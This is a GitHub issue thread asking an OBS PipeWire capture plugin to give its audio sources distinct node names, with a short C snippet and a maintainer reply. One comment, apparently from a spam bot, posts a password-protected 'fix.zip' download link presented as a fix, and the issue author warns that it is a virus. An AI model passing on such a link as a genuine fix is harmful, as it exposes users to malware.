### ISSUE TITLE
Better naming for audio sources

### ISSUE THREAD

**Issue by PancakeTAS** [dimtpap/obs-pipewire-audio-capture#73]
I originally switched to this project because the JACK client kept segmentation faulting my OBS (lol) and have been using it for quite a while. One of the things I find really annoying however, is that no matter how many audio sources I have, they are all named the same. This doesn't just make it difficult to distinguish them in Helvum, but also makes it impossible to hook them up to a wireplumber lua script and do stuff with them.

![image](https://github.com/user-attachments/assets/57e6a800-55ad-4c6f-8992-587d9e7e7d2f)
![image](https://github.com/user-attachments/assets/d54a24b5-a603-4a89-9bc7-688cb1c0760b)

In my incredibly hacky fork, I changed a couple of things however I do believe they should be a part of this main repository.
![image](https://github.com/user-attachments/assets/947f4ba1-6f1c-4651-a107-6425d3eafa46)

I wrote my fork a decent while ago so I don't actually remember what I changed to achieve this, but I believe it was:
```c
	pw->audio.stream =
		pw_stream_new(pw->core, obs_source_get_name(stream_output),
					  pw_properties_new(PW_KEY_NODE_NAME, obs_source_get_name(stream_output), PW_KEY_NODE_DESCRIPTION, "OBS Studio",
										PW_KEY_MEDIA_TYPE, "Audio", PW_KEY_MEDIA_CATEGORY, "Capture", PW_KEY_MEDIA_ROLE,
										"Production", PW_KEY_NODE_WANT_DRIVER, stream_want_driver ? "true" : "false",
										PW_KEY_STREAM_CAPTURE_SINK, stream_capture_sink ? "true" : "false", NULL));
```
(adding "obs_source_get_name(stream_output)" and "OBS Studio" as parameters).

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PancakeTAS** [comment]
And I have to apologize for the bots that have been haunting me for the past 3 issues I opened :sob: 
Please don't download and run them they are a virus

**Comment by dimtpap** [comment]
By the way, JACK sources are a much better fit for custom routing, since the sources of this plugin do some link management of their own and may get in your way
